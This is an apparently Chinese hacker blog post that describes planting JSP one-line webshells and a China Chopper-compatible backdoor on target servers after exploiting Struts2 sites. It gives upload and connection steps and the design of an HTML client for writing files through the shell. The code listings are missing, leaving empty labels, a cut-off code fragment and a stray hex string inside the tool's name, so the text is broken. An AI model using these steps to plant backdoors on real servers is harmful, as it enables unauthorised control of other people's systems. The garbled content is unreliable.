展开全部
相信用过一句话木马的黑阔们对中国32313133353236313431303231363533e4b893e5b19e31333337393033菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许一场血雨腥风的Struts2漏洞利用潮即将来临。
说了这么多废话,本文的目的是什么呢?其实只是想记录一下JSP几种后门代码啦,因为曾经找JSP菜刀马找的老辛苦了。
1、首先是JSP一句话木马和它的客户端小伙伴。(小伙伴们都惊呆了~~~)
以下是服务端,保存成one.jsp并上传至目标服务器中。
通过使用一句话木马客户端连接one.jsp木马。
将下列代码保存为html页面:
JSP一句话木马客户端
专用JSP木马连接器服务端地址你提交的代码
保存成的文件名:
服务端代码:
保存成的文件名:
服务端代码:
保存完成后,打开html页面,写入一句话木马服务端地址,例如http://www.cto365.com/one.jsp,写入需要的代码和保存的文件名称点击保存即可。
2、中国菜刀能用的菜刀马
本文除了对jsp一句话木马进行了说明,还提供了一个中国菜刀能用的菜刀马。
将下列代码保存为xx.jsp并上传至目标服务器,使用中国菜刀工具进行连接。
2){c.setC